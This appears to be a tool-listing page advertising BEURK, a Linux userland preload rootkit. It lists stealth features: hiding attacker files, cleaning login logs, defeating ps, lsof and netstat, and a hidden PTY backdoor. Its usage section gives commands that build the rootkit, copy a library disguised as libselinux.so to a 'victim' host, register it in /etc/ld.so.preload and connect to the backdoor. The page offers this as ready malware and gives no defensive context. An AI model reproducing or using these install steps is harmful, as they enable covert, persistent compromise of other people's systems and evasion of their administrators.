BEURK – Linux Userland Preload Rootkit

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

BEURK - Linux Userland Preload Rootkit

Being a userland rootkit it gives limited privileges (whatever the user has basically) vs a superuser or root level rootkit.

Features

Hide attacker files and directories
Realtime log cleanup (on utmp/wtmp)
Anti process and login detection
Bypass unhide, lsof, ps, ldd, netstat analysis
Furtive PTY backdoor client



Usage

Compile


git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make
1
2
3
git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make
Install


scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
1
2
scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
Enjoy !


./client.py victim_ip:port # connect with furtive backdoor
1
./client.py victim_ip:port # connect with furtive backdoor
Dependencies

The following packages are not required in order to build BEURK at the moment:

libpcap – to avoid local sniffing
libpam – for local PAM backdoor
libssl – for encrypted backdoor connection
You can download BEURK here: